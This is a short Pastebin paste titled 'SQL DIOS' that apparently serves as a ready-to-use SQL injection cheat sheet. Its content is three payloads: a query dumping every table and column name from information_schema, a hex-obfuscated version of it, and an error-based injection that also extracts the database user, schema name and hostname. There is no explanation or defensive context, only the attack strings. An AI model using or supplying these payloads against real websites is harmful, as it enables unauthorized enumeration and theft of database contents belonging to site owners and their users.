Advertisement
zucxk

SQL DIOS

Apr 19th, 2019
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. (select group_concat('<br>',table_name,' :: ',column_name) from information_schema.columns where table_schema=schema())
  2. # w/ HEX
  3. (select group_concat(0x3c62723e,table_name,0x203a3a20,column_name) from information_schema.columns where table_schema=schema())
  4. #ERROR BASED#
  5. and(select!x-~0. from(select concat(0x3c62723e,0x64697075,0x3c62723e,user(),0x3c62723e,schema(),0x3c62723e,@@hostname,0x3c62723e,(select group_concat(0x3c62723e,table_name,0x203a3a20,column_name)from information_schema.columns where table_schema=schema()))x)x)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement